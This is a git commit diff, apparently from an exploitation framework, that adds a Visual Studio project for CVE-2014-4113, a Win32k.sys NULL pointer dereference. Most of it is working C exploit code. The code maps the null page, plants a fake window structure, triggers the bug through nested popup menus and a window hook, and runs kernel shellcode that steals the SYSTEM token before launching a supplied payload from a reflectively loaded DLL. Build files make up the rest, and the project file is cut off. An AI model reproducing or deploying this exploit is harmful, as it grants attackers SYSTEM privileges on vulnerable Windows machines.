Land #4064, Win32k.sys NULL Pointer Dereference
This commit is contained in:
commit
04a99f09bb
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,151 @@
|
|||
## Ignore Visual Studio temporary files, build results, and
|
||||
## files generated by popular Visual Studio add-ons.
|
||||
|
||||
# User-specific files
|
||||
*.suo
|
||||
*.user
|
||||
*.sln.docstates
|
||||
|
||||
# Build results
|
||||
|
||||
[Dd]ebug/
|
||||
[Rr]elease/
|
||||
x64/
|
||||
build/
|
||||
[Bb]in/
|
||||
[Oo]bj/
|
||||
|
||||
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
|
||||
!packages/*/build/
|
||||
|
||||
# MSTest test Results
|
||||
[Tt]est[Rr]esult*/
|
||||
[Bb]uild[Ll]og.*
|
||||
|
||||
*_i.c
|
||||
*_p.c
|
||||
*.ilk
|
||||
*.meta
|
||||
*.obj
|
||||
*.pch
|
||||
*.pdb
|
||||
*.pgc
|
||||
*.pgd
|
||||
*.rsp
|
||||
*.sbr
|
||||
*.tlb
|
||||
*.tli
|
||||
*.tlh
|
||||
*.tmp
|
||||
*.tmp_proj
|
||||
*.log
|
||||
*.vspscc
|
||||
*.vssscc
|
||||
.builds
|
||||
*.pidb
|
||||
*.log
|
||||
*.scc
|
||||
|
||||
# Visual C++ cache files
|
||||
ipch/
|
||||
*.aps
|
||||
*.ncb
|
||||
*.opensdf
|
||||
*.sdf
|
||||
*.cachefile
|
||||
|
||||
# Visual Studio profiler
|
||||
*.psess
|
||||
*.vsp
|
||||
*.vspx
|
||||
|
||||
# Guidance Automation Toolkit
|
||||
*.gpState
|
||||
|
||||
# ReSharper is a .NET coding add-in
|
||||
_ReSharper*/
|
||||
*.[Rr]e[Ss]harper
|
||||
|
||||
# TeamCity is a build add-in
|
||||
_TeamCity*
|
||||
|
||||
# DotCover is a Code Coverage Tool
|
||||
*.dotCover
|
||||
|
||||
# NCrunch
|
||||
*.ncrunch*
|
||||
.*crunch*.local.xml
|
||||
|
||||
# Installshield output folder
|
||||
[Ee]xpress/
|
||||
|
||||
# DocProject is a documentation generator add-in
|
||||
DocProject/buildhelp/
|
||||
DocProject/Help/*.HxT
|
||||
DocProject/Help/*.HxC
|
||||
DocProject/Help/*.hhc
|
||||
DocProject/Help/*.hhk
|
||||
DocProject/Help/*.hhp
|
||||
DocProject/Help/Html2
|
||||
DocProject/Help/html
|
||||
|
||||
# Click-Once directory
|
||||
publish/
|
||||
|
||||
# Publish Web Output
|
||||
*.Publish.xml
|
||||
*.pubxml
|
||||
|
||||
# NuGet Packages Directory
|
||||
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
|
||||
#packages/
|
||||
|
||||
# Windows Azure Build Output
|
||||
csx
|
||||
*.build.csdef
|
||||
|
||||
# Windows Store app package directory
|
||||
AppPackages/
|
||||
|
||||
# Others
|
||||
sql/
|
||||
*.Cache
|
||||
ClientBin/
|
||||
[Ss]tyle[Cc]op.*
|
||||
~$*
|
||||
*~
|
||||
*.dbmdl
|
||||
*.[Pp]ublish.xml
|
||||
*.pfx
|
||||
*.publishsettings
|
||||
|
||||
# RIA/Silverlight projects
|
||||
Generated_Code/
|
||||
|
||||
# Backup & report files from converting an old project file to a newer
|
||||
# Visual Studio version. Backup files are not needed, because we have git ;-)
|
||||
_UpgradeReport_Files/
|
||||
Backup*/
|
||||
UpgradeLog*.XML
|
||||
UpgradeLog*.htm
|
||||
|
||||
# SQL Server files
|
||||
App_Data/*.mdf
|
||||
App_Data/*.ldf
|
||||
|
||||
# =========================
|
||||
# Windows detritus
|
||||
# =========================
|
||||
|
||||
# Windows image file caches
|
||||
Thumbs.db
|
||||
ehthumbs.db
|
||||
|
||||
# Folder config file
|
||||
Desktop.ini
|
||||
|
||||
# Recycle Bin used on file shares
|
||||
$RECYCLE.BIN/
|
||||
|
||||
# Mac crap
|
||||
.DS_Store
|
|
@ -0,0 +1,28 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Express 2013 for Windows Desktop
|
||||
VisualStudioVersion = 12.0.30723.0
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Win32 = Debug|Win32
|
||||
Debug|x64 = Debug|x64
|
||||
Release|Win32 = Release|Win32
|
||||
Release|x64 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.Build.0 = Debug|x64
|
||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
|
||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.ActiveCfg = Release|x64
|
||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.Build.0 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,490 @@
|
|||
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
||||
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
||||
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
||||
|
||||
// Purloined from ntstatus.h
|
||||
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
|
||||
|
||||
#define WIN32_NO_STATUS
|
||||
#include <windows.h>
|
||||
#undef WIN32_NO_STATUS
|
||||
|
||||
#ifndef _NTDEF_
|
||||
typedef __success(return >= 0) LONG NTSTATUS;
|
||||
typedef NTSTATUS *PNTSTATUS;
|
||||
#endif
|
||||
|
||||
#define DEBUGGING FALSE
|
||||
|
||||
#ifdef _M_X64
|
||||
typedef unsigned __int64 QWORD;
|
||||
typedef QWORD *PQWORD;
|
||||
#endif
|
||||
|
||||
int WndProcClue = 0;
|
||||
int HookCallbackClue = 0;
|
||||
WNDPROC lpPrevWndFunc;
|
||||
DWORD MyProcessId = 0;
|
||||
DWORD OffsetWindows = 0;
|
||||
|
||||
typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
|
||||
IN HANDLE ProcessHandle,
|
||||
IN PVOID *BaseAddress,
|
||||
IN PULONG ZeroBits,
|
||||
IN PSIZE_T RegionSize,
|
||||
IN ULONG AllocationType,
|
||||
IN ULONG Protect
|
||||
);
|
||||
|
||||
typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
|
||||
IN HANDLE ProcessId,
|
||||
OUT PVOID Process
|
||||
);
|
||||
|
||||
typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
|
||||
_In_ DWORD SystemInformationClass,
|
||||
_Inout_ PVOID SystemInformation,
|
||||
_In_ ULONG SystemInformationLength,
|
||||
_Out_opt_ PULONG ReturnLength
|
||||
);
|
||||
|
||||
typedef struct _SYSTEM_MODULE {
|
||||
HANDLE Reserved1;
|
||||
PVOID Reserved2;
|
||||
PVOID ImageBaseAddress;
|
||||
ULONG ImageSize;
|
||||
ULONG Flags;
|
||||
USHORT Id;
|
||||
USHORT Rank;
|
||||
USHORT w018;
|
||||
USHORT NameOffset;
|
||||
BYTE Name[256];
|
||||
} SYSTEM_MODULE, *PSYSTEM_MODULE;
|
||||
|
||||
|
||||
typedef struct _SYSTEM_MODULE_INFORMATION {
|
||||
ULONG ModulesCount;
|
||||
SYSTEM_MODULE Modules[0];
|
||||
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
|
||||
|
||||
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
|
||||
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
|
||||
|
||||
|
||||
long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
|
||||
{
|
||||
EndMenu();
|
||||
return -5;
|
||||
}
|
||||
|
||||
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
|
||||
#ifdef _M_X64
|
||||
if (*(DWORD *)(lParam + 16) == 0x1EB && !HookCallbackClue)
|
||||
#else
|
||||
if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
|
||||
#endif
|
||||
{
|
||||
HookCallbackClue = 1;
|
||||
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
|
||||
#ifdef _M_X64
|
||||
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
|
||||
#else
|
||||
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
|
||||
#endif
|
||||
}
|
||||
}
|
||||
return CallNextHookEx(0, code, wParam, lParam);
|
||||
}
|
||||
|
||||
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
|
||||
if (msg == 289 && WndProcClue != 1) {
|
||||
WndProcClue = 1;
|
||||
PostMessageA(hwnd, 256, 40, 0);
|
||||
PostMessageA(hwnd, 256, 39, 0);
|
||||
PostMessageA(hwnd, 513, 0, 0);
|
||||
}
|
||||
return DefWindowProc(hwnd, msg, wParam, lParam);
|
||||
}
|
||||
|
||||
#ifdef _M_X64
|
||||
QWORD MyPtiCurrent(void) {
|
||||
void *teb = (void *)__readgsqword(0x30);
|
||||
QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
|
||||
|
||||
return Win32ThreadInfo;
|
||||
}
|
||||
#else
|
||||
DWORD __stdcall MyPtiCurrent() {
|
||||
__asm {
|
||||
mov eax, fs : 18h
|
||||
mov eax, [eax + 40h]
|
||||
}
|
||||
}
|
||||
#endif
|
||||
|
||||
int _stdcall shellcode_ring0(int one, int two, int three, int four) {
|
||||
void *my_process_info = NULL;
|
||||
void *system_info = NULL;
|
||||
|
||||
pPsLookupProcessByProcessId((HANDLE)MyProcessId, &my_process_info);
|
||||
pPsLookupProcessByProcessId((HANDLE)4, &system_info);
|
||||
|
||||
*(PDWORD)((PBYTE)my_process_info + OffsetWindows) = *(PDWORD)((PBYTE)system_info + OffsetWindows);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void
|
||||
LogMessage(char* pszFormat, ...) {
|
||||
if (DEBUGGING != TRUE) {
|
||||
return;
|
||||
}
|
||||
static char s_acBuf[2048];
|
||||
va_list args;
|
||||
va_start(args, pszFormat);
|
||||
vsprintf(s_acBuf, pszFormat, args);
|
||||
printf("%s\n", s_acBuf);
|
||||
OutputDebugString(s_acBuf);
|
||||
va_end(args);
|
||||
}
|
||||
|
||||
DWORD WINAPI ExecutePayload(LPVOID lpPayload) {
|
||||
VOID(*lpCode)() = (VOID(*)())lpPayload;
|
||||
lpCode();
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
||||
void Win32kNullPage(LPVOID lpPayload) {
|
||||
HWND hWnd;
|
||||
WNDCLASSA WndClass;
|
||||
LPBYTE promise_land = NULL;
|
||||
HMODULE hNtdll = NULL;
|
||||
HMODULE ntkrnl = NULL;
|
||||
NTSTATUS status;
|
||||
PULONG pSystemInfoBuffer = NULL;
|
||||
lZwQuerySystemInformation pZwQuerySystemInformation = NULL;
|
||||
ULONG SystemInfoBufferSize = 0;
|
||||
char nt_name[256];
|
||||
PVOID nt_base;
|
||||
OSVERSIONINFOA VersionInformation;
|
||||
|
||||
// Getting Windows version
|
||||
LogMessage("[*] Getting Windows version...");
|
||||
memset(&VersionInformation, 0, sizeof(OSVERSIONINFOA));
|
||||
VersionInformation.dwOSVersionInfoSize = 148;
|
||||
if (!GetVersionExA(&VersionInformation)) {
|
||||
LogMessage("[!] Failed to get windows version");
|
||||
return;
|
||||
}
|
||||
|
||||
#ifdef _M_X64
|
||||
if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
|
||||
LogMessage("[*] Windows 6.1 found...");
|
||||
OffsetWindows = 0x208;
|
||||
}
|
||||
#else
|
||||
if (VersionInformation.dwMajorVersion == 6) {
|
||||
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
|
||||
LogMessage("[*] Windows 6.1 found...");
|
||||
OffsetWindows = 0xf8;
|
||||
}
|
||||
else if (!VersionInformation.dwMinorVersion) {
|
||||
LogMessage("[*] Windows 6.0 found..."); // Ex: Windows 2008 R2
|
||||
OffsetWindows = 0xe0;
|
||||
}
|
||||
else {
|
||||
LogMessage("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", VersionInformation.dwMinorVersion);
|
||||
return;
|
||||
}
|
||||
}
|
||||
else if (VersionInformation.dwMajorVersion == 5) {
|
||||
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows XP SP3
|
||||
LogMessage("[*] Windows 5.1 found...");
|
||||
OffsetWindows = 0xc8;
|
||||
}
|
||||
else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2) { // Ex: Windows 2003 SP2
|
||||
LogMessage("[*] Windows 5.2 found...");
|
||||
OffsetWindows = 0xd8;
|
||||
}
|
||||
else {
|
||||
LogMessage("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm");
|
||||
return;
|
||||
}
|
||||
}
|
||||
#endif
|
||||
else {
|
||||
LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
|
||||
return;
|
||||
}
|
||||
|
||||
// Solve symbols
|
||||
LogMessage("[*] Solving symbols...");
|
||||
|
||||
hNtdll = LoadLibraryA("ntdll");
|
||||
if (hNtdll == NULL) {
|
||||
LogMessage("[!] Failed to Load ntdll...");
|
||||
return;
|
||||
}
|
||||
|
||||
pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
|
||||
if (pZwQuerySystemInformation == NULL) {
|
||||
LogMessage("[!] Failed to solve ZwQuerySystemInformation");
|
||||
return;
|
||||
}
|
||||
|
||||
pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
|
||||
if (pNtAllocateVirtualMemory == NULL) {
|
||||
LogMessage("[!] Failed to solve NtAllocateVirtualMemory");
|
||||
return;
|
||||
}
|
||||
|
||||
LogMessage("[*] Requesting Kernel loaded modules...");
|
||||
|
||||
status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize);
|
||||
|
||||
if (SystemInfoBufferSize == 0) {
|
||||
LogMessage("[!] Requesting pZwQuerySystemInformation required length failed");
|
||||
return;
|
||||
}
|
||||
else {
|
||||
LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
|
||||
}
|
||||
|
||||
pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, SystemInfoBufferSize);
|
||||
if (pSystemInfoBuffer == NULL) {
|
||||
LogMessage("[!] Allocation for SystemInfo failed");
|
||||
return;
|
||||
}
|
||||
|
||||
status = pZwQuerySystemInformation(11, pSystemInfoBuffer, SystemInfoBufferSize, &SystemInfoBufferSize);
|
||||
|
||||
if (status != STATUS_SUCCESS) {
|
||||
LogMessage("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
LogMessage("[*] Parsing SYSTEM_INFO...");
|
||||
|
||||
SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer;
|
||||
|
||||
LogMessage("[*] %d Kernel modules found\n", smi->ModulesCount);
|
||||
|
||||
memset(nt_name, 0, 256);
|
||||
|
||||
int i = 0;
|
||||
while (i < smi->ModulesCount) {
|
||||
SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i);
|
||||
LogMessage("[*] Checking module %s", sm->Name);
|
||||
if (strstr((char *)sm->Name, ".exe")) {
|
||||
char *start = strstr((char *)sm->Name, "nt");
|
||||
if (start != NULL) {
|
||||
nt_base = sm->ImageBaseAddress;
|
||||
strncpy_s(nt_name, 256, start, _TRUNCATE);
|
||||
break;
|
||||
}
|
||||
}
|
||||
i++;
|
||||
}
|
||||
|
||||
if (nt_name == NULL) {
|
||||
LogMessage("[!] nt not found");
|
||||
return;
|
||||
}
|
||||
else {
|
||||
LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
|
||||
}
|
||||
|
||||
ntkrnl = LoadLibraryA(nt_name);
|
||||
|
||||
LogMessage("[*] %s loaded in userspace at: %08x\n", nt_name, ntkrnl);
|
||||
|
||||
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(ntkrnl, "PsLookupProcessByProcessId");
|
||||
|
||||
if (pPsLookupProcessByProcessId == NULL) {
|
||||
LogMessage("[!] Failed to solve PsLookupProcessByProcessId\n");
|
||||
return;
|
||||
}
|
||||
|
||||
#ifdef _M_X64
|
||||
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl));
|
||||
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
|
||||
#else
|
||||
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
|
||||
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
|
||||
#endif
|
||||
|
||||
MyProcessId = GetCurrentProcessId();
|
||||
|
||||
// Register Class
|
||||
LogMessage("[*] Registering class...");
|
||||
|
||||
memset(&WndClass, 0, sizeof(WNDCLASSA));
|
||||
WndClass.lpfnWndProc = WndProc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
|
||||
WndClass.lpszClassName = "woqunimalegebi";
|
||||
|
||||
if (RegisterClassA(&WndClass) == 0) {
|
||||
LogMessage("[!] RegisterClassA failed ");
|
||||
return;
|
||||
}
|
||||
|
||||
// Create Window
|
||||
LogMessage("[*] Creating window...");
|
||||
hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
|
||||
|
||||
if (hWnd == NULL) {
|
||||
LogMessage("[!] CreateWindowExA failed");
|
||||
return;
|
||||
}
|
||||
|
||||
// Making everything ready for exploitation...
|
||||
|
||||
LogMessage("[*] Allocating null page...");
|
||||
#ifdef _M_X64
|
||||
ULONGLONG base_address = 0x00000000fffffffb;
|
||||
#else
|
||||
DWORD base_address = 1;
|
||||
#endif
|
||||
SIZE_T region_size = 0x1000;
|
||||
ULONG zero_bits = 0;
|
||||
HANDLE current_process = NULL;
|
||||
|
||||
current_process = GetCurrentProcess();
|
||||
|
||||
if (pNtAllocateVirtualMemory(current_process, (LPVOID*)(&base_address), 0, ®ion_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
|
||||
LogMessage("[!] Failed to allocate null page");
|
||||
return;
|
||||
}
|
||||
|
||||
LogMessage("[*] Getting PtiCurrent...");
|
||||
|
||||
#ifdef _M_X64
|
||||
ULONGLONG pti = MyPtiCurrent();
|
||||
#else
|
||||
DWORD pti = MyPtiCurrent();
|
||||
#endif
|
||||
|
||||
if (pti == 0) {
|
||||
LoadLibrary("user32.dll");
|
||||
LoadLibrary("gdi32.dll");
|
||||
pti = MyPtiCurrent();
|
||||
}
|
||||
|
||||
if (pti == 0) {
|
||||
LogMessage("[!] Filed to get PtiCurrent");
|
||||
return;
|
||||
}
|
||||
else {
|
||||
#ifdef _M_X64
|
||||
LogMessage("[*] Good! pti 0x%016llx", pti);
|
||||
#else
|
||||
LogMessage("[*] Good! pti 0x%08x", pti);
|
||||
#endif
|
||||
}
|
||||
|
||||
LogMessage("[*] Creating a fake structure at NULL...");
|
||||
|
||||
#ifdef _M_X64
|
||||
void *test = NULL;
|
||||
(QWORD)test = 0x10000000B;
|
||||
*((PQWORD)test) = pti;
|
||||
|
||||
/* win32k!tagWND->bServerSideWindowProc = TRUE */
|
||||
(QWORD)test = 0x100000025;
|
||||
*((PBYTE)test) = 4;
|
||||
|
||||
/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
|
||||
(QWORD)test = 0x10000008B;
|
||||
*((PQWORD)test) = &shellcode_ring0;
|
||||
#else
|
||||
void *test = promise_land + 3;
|
||||
/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
|
||||
.text:BF8B93F4 02C mov edi, _gptiCurrent
|
||||
.text:BF8B93FA 02C cmp edi, [esi + 8];
|
||||
.text:BF8B93FD 02C jz loc_BF8B
|
||||
*/
|
||||
*(LPDWORD)test = pti;
|
||||
|
||||
*((LPBYTE)(promise_land + 0x11)) = 0x4;
|
||||
|
||||
test = promise_land + 0x5b;
|
||||
*(LPDWORD)test = (DWORD)shellcode_ring0;
|
||||
#endif
|
||||
|
||||
// Exploit!
|
||||
|
||||
LogMessage("[*] Triggering vulnerability...");
|
||||
HMENU MenuOne = CreatePopupMenu();
|
||||
if (MenuOne == NULL) {
|
||||
LogMessage("[!] First CreatePopupMenu failed");
|
||||
return;
|
||||
}
|
||||
|
||||
MENUITEMINFOA MenuOneInfo;
|
||||
memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
|
||||
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
|
||||
MenuOneInfo.fMask = MIIM_STRING;
|
||||
|
||||
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
|
||||
LogMessage("[!] First InsertMenuItemA failed");
|
||||
DestroyMenu(MenuOne);
|
||||
return;
|
||||
}
|
||||
|
||||
HMENU MenuTwo = CreatePopupMenu();
|
||||
if (MenuTwo == NULL) {
|
||||
LogMessage("[!] Second CreatePopupMenu failed");
|
||||
DestroyMenu(MenuOne);
|
||||
return;
|
||||
}
|
||||
|
||||
MENUITEMINFOA MenuTwoInfo;
|
||||
memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
|
||||
MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
|
||||
MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
|
||||
MenuTwoInfo.dwTypeData = "";
|
||||
MenuTwoInfo.cch = 1;
|
||||
MenuTwoInfo.hSubMenu = MenuOne;
|
||||
if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE) {
|
||||
LogMessage("[!] Second InsertMenuItemA failed");
|
||||
DestroyMenu(MenuTwo);
|
||||
DestroyMenu(MenuOne);
|
||||
return;
|
||||
}
|
||||
|
||||
if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) {
|
||||
LogMessage("[!] SetWindowsHookExA failed :-(\n");
|
||||
DestroyMenu(MenuTwo);
|
||||
DestroyMenu(MenuOne);
|
||||
return;
|
||||
}
|
||||
|
||||
// 'crash' it!
|
||||
TrackPopupMenu(MenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
|
||||
|
||||
// If everything worked process should be privileges at this point
|
||||
LogMessage("[!] Executing payload...");
|
||||
CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL);
|
||||
return;
|
||||
}
|
||||
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
|
||||
BOOL bReturnValue = TRUE;
|
||||
switch (dwReason) {
|
||||
case DLL_QUERY_HMODULE:
|
||||
hAppInstance = hinstDLL;
|
||||
if (lpReserved != NULL) {
|
||||
*(HMODULE *)lpReserved = hAppInstance;
|
||||
}
|
||||
break;
|
||||
case DLL_PROCESS_ATTACH:
|
||||
hAppInstance = hinstDLL;
|
||||
Win32kNullPage(lpReserved);
|
||||
break;
|
||||
case DLL_PROCESS_DETACH:
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
break;
|
||||
}
|
||||
return bReturnValue;
|
||||
};
|
150
external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj
vendored
Executable file
150
external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj
vendored
Executable file
|
@ -0,0 +1,150 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid>
|
||||
<RootNamespace>cve20144113</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
